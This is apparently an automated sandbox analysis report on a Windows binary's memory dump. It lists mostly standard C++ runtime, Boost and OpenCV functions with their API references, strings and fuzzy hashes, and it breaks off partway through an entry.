Instruction Fuzzy Hash: 1F01E132E0012A87CF04FBA0C84AABD7B76BF84720F54811EE81177291DF78EE028785

Uniqueness

Uniqueness Score: -1.00%

Function 00586AFB, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00586B02
std::_Lockit::_Lockit.LIBCPMT ref: 00586B0C

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 00586B2C
__CxxThrowException@8.LIBVCRUNTIME ref: 00586B63
std::_Facet_Register.LIBCPMT ref: 00586B82
std::_Lockit::~_Lockit.LIBCPMT ref: 00586B8B

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 49cecdee1888ff5400594f79c7491ccf6bce1ad4eee74dd977a1469709a5cab3
Instruction ID: 1b3b7bcabb26220a1d94978600dd4a2176515027811550b14c2acc6d44849b9a
Opcode Fuzzy Hash: 49cecdee1888ff5400594f79c7491ccf6bce1ad4eee74dd977a1469709a5cab3
Instruction Fuzzy Hash: B201E132E0012A8BCF00FBA0D846ABD7B76BF90725F54051EF8117B291DF78AE028795

Uniqueness

Uniqueness Score: -1.00%

Function 00586E0C, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00586E13
std::_Lockit::_Lockit.LIBCPMT ref: 00586E1D

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 00586E3D
__CxxThrowException@8.LIBVCRUNTIME ref: 00586E74
std::_Facet_Register.LIBCPMT ref: 00586E93
std::_Lockit::~_Lockit.LIBCPMT ref: 00586E9C

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: a0745f80e65ae47ed21d8f54d65da73e1bc9d5e7202c31e1bd7239126e4643fa
Instruction ID: 78f031dcd81d295256e0ad33f2ac7f59cc44e543bd457230b3793aba3787fe51
Opcode Fuzzy Hash: a0745f80e65ae47ed21d8f54d65da73e1bc9d5e7202c31e1bd7239126e4643fa
Instruction Fuzzy Hash: E501A575D0012987CF15FBA0C8469BE7B76BF94720F54011EF8117B2D1DF78AA018B95

Uniqueness

Uniqueness Score: -1.00%

Function 00586EA9, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00586EB0
std::_Lockit::_Lockit.LIBCPMT ref: 00586EBA

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 00586EDA
__CxxThrowException@8.LIBVCRUNTIME ref: 00586F11
std::_Facet_Register.LIBCPMT ref: 00586F30
std::_Lockit::~_Lockit.LIBCPMT ref: 00586F39

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: b590dd5a95d5c7176f4f4bebd7065758ae2287e4ec53d536990459d5111684b0
Instruction ID: 36bdd8f9b3c6d3a715d4fecd9f9c2dd12b19e362289941a1946ed2d3c47ad54d
Opcode Fuzzy Hash: b590dd5a95d5c7176f4f4bebd7065758ae2287e4ec53d536990459d5111684b0
Instruction Fuzzy Hash: 4001CE76D0012A97CF11FBA0D846ABDBB76BF90720F54011EE91177291CF78EA028B85

Uniqueness

Uniqueness Score: -1.00%

Function 00586F46, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00586F4D
std::_Lockit::_Lockit.LIBCPMT ref: 00586F57

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 00586F77
__CxxThrowException@8.LIBVCRUNTIME ref: 00586FAE
std::_Facet_Register.LIBCPMT ref: 00586FCD
std::_Lockit::~_Lockit.LIBCPMT ref: 00586FD6

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 42bc062a20b49ef2b1c4ee798b7d79fe8e9c2541235d5a572d39628af47594b5
Instruction ID: 70afa757b7d331fb800549c0ed43ed25e5934ca25c36f6009688b21e6d67ed3b
Opcode Fuzzy Hash: 42bc062a20b49ef2b1c4ee798b7d79fe8e9c2541235d5a572d39628af47594b5
Instruction Fuzzy Hash: D201E132D0012A8BCF04FBA0D846ABD7B72BF90720F54051EF9117B291CF78EA028B85

Uniqueness

Uniqueness Score: -1.00%

Function 00586FE3, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00586FEA
std::_Lockit::_Lockit.LIBCPMT ref: 00586FF4

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 00587014
__CxxThrowException@8.LIBVCRUNTIME ref: 0058704B
std::_Facet_Register.LIBCPMT ref: 0058706A
std::_Lockit::~_Lockit.LIBCPMT ref: 00587073

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 76c01c41dd5076078d920ec235810dd89ba84fe90f6d9e76ab5c1201b3b6a86b
Instruction ID: 3da7bb0c2564773db8884a1d960073aa8a6c50b0925113ed65e372681be063ff
Opcode Fuzzy Hash: 76c01c41dd5076078d920ec235810dd89ba84fe90f6d9e76ab5c1201b3b6a86b
Instruction Fuzzy Hash: E901E176D00129C7CF01FBA0C84AABD7B76BF94720F64011EE91177291DF78EA028B95

Uniqueness

Uniqueness Score: -1.00%

Function 005871BA, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005871C1
std::_Lockit::_Lockit.LIBCPMT ref: 005871CB

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 005871EB
__CxxThrowException@8.LIBVCRUNTIME ref: 00587222
std::_Facet_Register.LIBCPMT ref: 00587241
std::_Lockit::~_Lockit.LIBCPMT ref: 0058724A

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 387cc7aec688d462a92743a8f6240c499c95f90d55785faf0e26c8bd3269279b
Instruction ID: 53baad933a1a9d78d5ebf71a7db44f88538b6f9be4b6698cc70fe2232b2cdb36
Opcode Fuzzy Hash: 387cc7aec688d462a92743a8f6240c499c95f90d55785faf0e26c8bd3269279b
Instruction Fuzzy Hash: FE01CE36D0412A87CF05FBA0C846ABD7B76BF84720F64051EF82277291DF78EA018795

Uniqueness

Uniqueness Score: -1.00%

Function 00587257, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0058725E
std::_Lockit::_Lockit.LIBCPMT ref: 00587268

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 00587288
__CxxThrowException@8.LIBVCRUNTIME ref: 005872BF
std::_Facet_Register.LIBCPMT ref: 005872DE
std::_Lockit::~_Lockit.LIBCPMT ref: 005872E7

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 035a0d2cb02ef3ccdf8db43625f66f48ba025dba11e6e261f966438d970f4d87
Instruction ID: a0ca83432d0efc3d82ab6b7b034826c60db9aabab451f799da73c8dfd84624ce
Opcode Fuzzy Hash: 035a0d2cb02ef3ccdf8db43625f66f48ba025dba11e6e261f966438d970f4d87
Instruction Fuzzy Hash: 97018E76E0012997CF05FBA0C846ABD7B76BF94720F64051EF812772D1DF78AA028795

Uniqueness

Uniqueness Score: -1.00%

Function 005872F4, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005872FB
std::_Lockit::_Lockit.LIBCPMT ref: 00587305

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 00587325
__CxxThrowException@8.LIBVCRUNTIME ref: 0058735C
std::_Facet_Register.LIBCPMT ref: 0058737B
std::_Lockit::~_Lockit.LIBCPMT ref: 00587384

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: fe02b0ba852a703a0f06ee0030525541247e9800abe2f3dd819f1a379f7983e9
Instruction ID: 58ef56f43cc110a2dac502ad5072be58545a32b69611c838da8830e03516e16f
Opcode Fuzzy Hash: fe02b0ba852a703a0f06ee0030525541247e9800abe2f3dd819f1a379f7983e9
Instruction Fuzzy Hash: C401C272D001298BCF01FBA0C8869BD7B76BF84720F64051EEC1177291DF78EA029796

Uniqueness

Uniqueness Score: -1.00%

Function 00587391, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00587398
std::_Lockit::_Lockit.LIBCPMT ref: 005873A2

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 005873C2
__CxxThrowException@8.LIBVCRUNTIME ref: 005873F9
std::_Facet_Register.LIBCPMT ref: 00587418
std::_Lockit::~_Lockit.LIBCPMT ref: 00587421

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 87f3023760e3cfc150e56195f20c611a203aeff010baed38f69fcacd59f6b086
Instruction ID: d4706e0bdf85535e86c2997f0a725fb0a053402166482df61c576a159a05b070
Opcode Fuzzy Hash: 87f3023760e3cfc150e56195f20c611a203aeff010baed38f69fcacd59f6b086
Instruction Fuzzy Hash: BB01CE36D0012987CF00FBA0C846ABD7B72BF94720F64051EF811772A1DF78AA028796

Uniqueness

Uniqueness Score: -1.00%

Function 005938FF, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00593906
std::_Lockit::_Lockit.LIBCPMT ref: 00593910

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 00593930
__CxxThrowException@8.LIBVCRUNTIME ref: 00593967
std::_Facet_Register.LIBCPMT ref: 00593986
std::_Lockit::~_Lockit.LIBCPMT ref: 0059398F

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: b6754772cdaa1efc3eb2e9b992072e0acfbf140816eed133af288f50b9fa3cf5
Instruction ID: cd153f843e523d993fbf8b5bcf5544ff00e7370813db43b281d7b980c395794e
Opcode Fuzzy Hash: b6754772cdaa1efc3eb2e9b992072e0acfbf140816eed133af288f50b9fa3cf5
Instruction Fuzzy Hash: 2801A136D001299BDF05FBA0D846ABDBB76BF84720F54051EF8117B2D1DFB8AA018B95

Uniqueness

Uniqueness Score: -1.00%

Function 0059399C, Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005939A3
std::_Lockit::_Lockit.LIBCPMT ref: 005939AD

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Getfacet.LIBCPMT ref: 005939CD
__CxxThrowException@8.LIBVCRUNTIME ref: 00593A04
std::_Facet_Register.LIBCPMT ref: 00593A23
std::_Lockit::~_Lockit.LIBCPMT ref: 00593A2C

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologH_prolog3RegisterThrowstd::locale::_
String ID:
API String ID: 2465509477-0
Opcode ID: 11b492f9387b47d13bf964660a950ebbbe6c4e9001d0f306eee3e52fbc66e7c3
Instruction ID: 8cc456c93b60af68b317ae98c0d6cb15ba8a04cd525fef473dbbb1b6fb5b87a9
Opcode Fuzzy Hash: 11b492f9387b47d13bf964660a950ebbbe6c4e9001d0f306eee3e52fbc66e7c3
Instruction Fuzzy Hash: 7E01A176D0012A87CF15FBA1D846ABD7B76BF84720F14011EE8117B291DF78AA02CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004249FD, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 251COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00424A02

Part of subcall function 00415A23: WSASocketW.WS2_32(?,?,?,00000000,00000000,00000001), ref: 00415A36

htonl.WS2_32(7F000001), ref: 00424A9C
htonl.WS2_32(00000000), ref: 00424AF3
htonl.WS2_32(7F000001), ref: 00424AFF

Part of subcall function 0041037A: __EH_prolog.LIBCMT ref: 0041037F

Strings

socket_select_interrupter, xrefs: 00424A42, 00424ABE, 00424AE4, 00424B15, 00424B45, 00424B6A, 00424BD0, 00424C02, 00424C54

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: htonl$H_prolog$Socket
String ID: socket_select_interrupter
API String ID: 2867122483-3103927870
Opcode ID: a8c2c156685f2f3609672905bd2a65712663277857bad8267cb683733ac0607b
Instruction ID: c75956f0ae3c90dcd665b204e711d45a461bd46a798bdc887665810f99917610
Opcode Fuzzy Hash: a8c2c156685f2f3609672905bd2a65712663277857bad8267cb683733ac0607b
Instruction Fuzzy Hash: 8191E871E01108ABDB14DBA4E842BEEB7B9EF84324F60422BF521A72C1DB785F45C794

Uniqueness

Uniqueness Score: -1.00%

Function 00419A6E, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 222COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00419A72

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 00419A7D

Part of subcall function 0047DA23: __EH_prolog.LIBCMT ref: 0047DA28
Part of subcall function 0047DA23: GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 0047DAD7
Part of subcall function 0047DA23: GetProcAddress.KERNEL32(00000000), ref: 0047DADE

Part of subcall function 00413FDC: std::_Throw_Cpp_error.LIBCPMT ref: 00413FE7

Strings

I, xrefs: 00419B02
T, xrefs: 00419B09
[, xrefs: 00419B7C

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$AddressCpp_errorExceptionException@8HandleModuleProcRaiseThrowThrow_std::_
String ID: I$T$[
API String ID: 3644655947-3665107706
Opcode ID: 33d5f4c2bff0747dad46018c0e3a38fdb7163598476964875482635c9530936b
Instruction ID: 6740d701ddf893d201b5c16348b7ef076a2e31ad99bf1fa9b1970b05ab235f7b
Opcode Fuzzy Hash: 33d5f4c2bff0747dad46018c0e3a38fdb7163598476964875482635c9530936b
Instruction Fuzzy Hash: BD81E571D0424CEEDB00DFE9D881BEDBBB8AF59304F20812EF515A7191EB785E848B65

Uniqueness

Uniqueness Score: -1.00%

Function 0041A684, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 221COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0041A688

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 0041A693

Part of subcall function 0047DA23: __EH_prolog.LIBCMT ref: 0047DA28
Part of subcall function 0047DA23: GetModuleHandleA.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 0047DAD7
Part of subcall function 0047DA23: GetProcAddress.KERNEL32(00000000), ref: 0047DADE

Part of subcall function 00413FDC: std::_Throw_Cpp_error.LIBCPMT ref: 00413FE7

Strings

5, xrefs: 0041A71F
u, xrefs: 0041A792
~, xrefs: 0041A718

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$AddressCpp_errorExceptionException@8HandleModuleProcRaiseThrowThrow_std::_
String ID: 5$u$~
API String ID: 3644655947-2497507236
Opcode ID: e38c39933b8d80531f24061b1f4a33642896065c8d7e0814c8cabb7572ce8600
Instruction ID: c6e0f3e7d2fd5dbe3bcb36ba580f339431f1455650e05b2d2ab67a5bd05c9d7b
Opcode Fuzzy Hash: e38c39933b8d80531f24061b1f4a33642896065c8d7e0814c8cabb7572ce8600
Instruction Fuzzy Hash: 8081D671D0424CEEDB00EFE9D881BEDBBB8EF55304F20412EE515A7191EB785A84CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0043691F, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 214COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00436923

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 0043692E

Part of subcall function 00460981: __EH_prolog.LIBCMT ref: 00460986

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Part of subcall function 004350CF: __EH_prolog.LIBCMT ref: 004350D4
Part of subcall function 004350CF: new.LIBCMT ref: 0043511A

Part of subcall function 004AB703: std::_Deallocate.LIBCONCRT ref: 004AB733

Part of subcall function 00411B0E: std::_Deallocate.LIBCONCRT ref: 00411B20

Strings

d, xrefs: 00436A10
1.38, xrefs: 00436A5D
unknown, xrefs: 004369A2

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: DeallocateH_prologstd::_$ExceptionException@8RaiseThrow
String ID: 1.38$d$unknown
API String ID: 3768170552-1437315834
Opcode ID: c2ad4441e20adb40745e5791871400ccfac18b333dce4dd1f534eff407ae1350
Instruction ID: 4b5ae59505a5be7f1b8f18294c6627526a78df8af475de61f54828c0ffec9e14
Opcode Fuzzy Hash: c2ad4441e20adb40745e5791871400ccfac18b333dce4dd1f534eff407ae1350
Instruction Fuzzy Hash: 6181F771D0428CEADB10EBA9DD427DDBFB4AF25308F1080AEE54567192DB741F88CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 005273DB, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 185COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 005273E0

Strings

0 <= _dims && _dims <= CV_MAX_DIM, xrefs: 00527601
The total matrix size does not fit to "size_t" type, xrefs: 00527523
cv::setSize, xrefs: 00527512, 00527571, 005275F0
s >= 0, xrefs: 00527582

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: 0 <= _dims && _dims <= CV_MAX_DIM$The total matrix size does not fit to "size_t" type$cv::setSize$s >= 0
API String ID: 3519838083-1770251609
Opcode ID: 1e82fa99286308494e339b38f434e1c5cfdae780e91d060493535c91ab20ebd7
Instruction ID: 4e7a3f975187a7e94f4a0d792aa5d11b4b89b091d2d827e6e5719dbbace165a3
Opcode Fuzzy Hash: 1e82fa99286308494e339b38f434e1c5cfdae780e91d060493535c91ab20ebd7
Instruction Fuzzy Hash: 7F71E2B1A0461DDFDB24DFA4D881AEDBFB1BF49304F14816EE10A972D1EB74AA04CB50

Uniqueness

Uniqueness Score: -1.00%

Function 004A5857, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004A585C
std::exception::exception.LIBCONCRT ref: 004A5A01
__CxxThrowException@8.LIBVCRUNTIME ref: 004A5A29
std::exception::exception.LIBCONCRT ref: 004A5A4A

Strings

bad conversion, xrefs: 004A59F9, 004A5A42

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::exception::exception$Exception@8H_prologThrow
String ID: bad conversion
API String ID: 1448338827-2629740042
Opcode ID: 456834de3ac92db60bae8f0b531d4d296c55be2c615f4db672cb8a9a4b259767
Instruction ID: e2521cf19c7c514a6cd896249d777fc064a2aa9f52eff57f4475ff9a593903a7
Opcode Fuzzy Hash: 456834de3ac92db60bae8f0b531d4d296c55be2c615f4db672cb8a9a4b259767
Instruction Fuzzy Hash: 32618EB1D00248EFDB10DFE9C980AEEBBB8FF15314F14442EE545AB242D774AA49CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00412CE4, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 136COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00412CE9

Part of subcall function 0040F39B: __EH_prolog.LIBCMT ref: 0040F3A0

Part of subcall function 0041308A: __EH_prolog.LIBCMT ref: 0041308F

Part of subcall function 0041046F: __EH_prolog.LIBCMT ref: 00410474

new.LIBCMT ref: 00412DCD

Part of subcall function 00412F5C: __EH_prolog.LIBCMT ref: 00412F61

Strings

a0A, xrefs: 00412D65
5A, xrefs: 00412D76
class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 00412DA3

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog
String ID: a0A$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)$5A
API String ID: 3519838083-280365165
Opcode ID: 07c4d31388b84f4032e8d50f11391717bf80c22b33ca8e30762f7553135a25ff
Instruction ID: 87e0541cf2904c335b22cf6d6275a1c02b6df84ccc2e5eca1df84b1b5e94cea1
Opcode Fuzzy Hash: 07c4d31388b84f4032e8d50f11391717bf80c22b33ca8e30762f7553135a25ff
Instruction Fuzzy Hash: 4E5175B0D04288DFDB00DF98D9846EDBFB6AF55308F14806EE404EB241D7B89A49CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00695013, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

tdA, xrefs: 00695015

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: tdA
API String ID: 0-2901657147
Opcode ID: c6e9f190fb23edd07fa84333adef7a853451afe721767e536ff5a6b36f26999d
Instruction ID: 5eac8436f541adff5e16d85cf94dd1f9aa58db9647923bcfe447eda4d50430eb
Opcode Fuzzy Hash: c6e9f190fb23edd07fa84333adef7a853451afe721767e536ff5a6b36f26999d
Instruction Fuzzy Hash: 54410E71A00704BFDB259F78CC41B9ABBFEEB48710F10452EF152DBA81D675994187D4

Uniqueness

Uniqueness Score: -1.00%

Function 004B5137, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B513C
std::exception::exception.LIBCONCRT ref: 004B527C
__CxxThrowException@8.LIBVCRUNTIME ref: 004B52AA

Part of subcall function 004B7B20: __EH_prolog.LIBCMT ref: 004B7B25
Part of subcall function 004B7B20: std::exception::exception.LIBCONCRT ref: 004B7B74
Part of subcall function 004B7B20: __CxxThrowException@8.LIBVCRUNTIME ref: 004B7BA2
Part of subcall function 004B7B20: std::exception::exception.LIBCONCRT ref: 004B7BD8

Strings

unexpected end of data, xrefs: 004B5272
4s, xrefs: 004B52A1, 004B52A9

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: std::exception::exception$Exception@8H_prologThrow
String ID: 4s$unexpected end of data
API String ID: 1448338827-2591715117
Opcode ID: eb46157da4a711b7671613d0298472427b39623e1ddf097056b9aed906c66bde
Instruction ID: a5bd9f356628c17dcac3fb439ed74d8d2602c6299a8efbe9bec23ffae0727124
Opcode Fuzzy Hash: eb46157da4a711b7671613d0298472427b39623e1ddf097056b9aed906c66bde
Instruction Fuzzy Hash: D14193B0C0968559EB298B6C80447E6FFA66F16314F4883DBD1D44A243C37C99CB8F6D

Uniqueness

Uniqueness Score: -1.00%

Function 0042CC20, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 112COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0042CC24

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 0042CC2F

Part of subcall function 00476ADD: __EH_prolog.LIBCMT ref: 00476AE2

Part of subcall function 00461197: __EH_prolog.LIBCMT ref: 0046119C

Strings

n, xrefs: 0042CC8E
y, xrefs: 0042CC95
+, xrefs: 0042CC9C

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrow
String ID: +$n$y
API String ID: 1193697898-3306889077
Opcode ID: 9c63549360779c4e09e068987efc47d7d71e5f76c08b6df28c9428073a9a01da
Instruction ID: f7e8215d45fa6a78abee873fe4d6ab9a41dfb2205752a1cf28a35e60d1cd1578
Opcode Fuzzy Hash: 9c63549360779c4e09e068987efc47d7d71e5f76c08b6df28c9428073a9a01da
Instruction Fuzzy Hash: 9D411470D04288DEDB10DFA5D9857EDBBB4AF55308F1080AEE109B7282DBB81F49CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00526C8E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

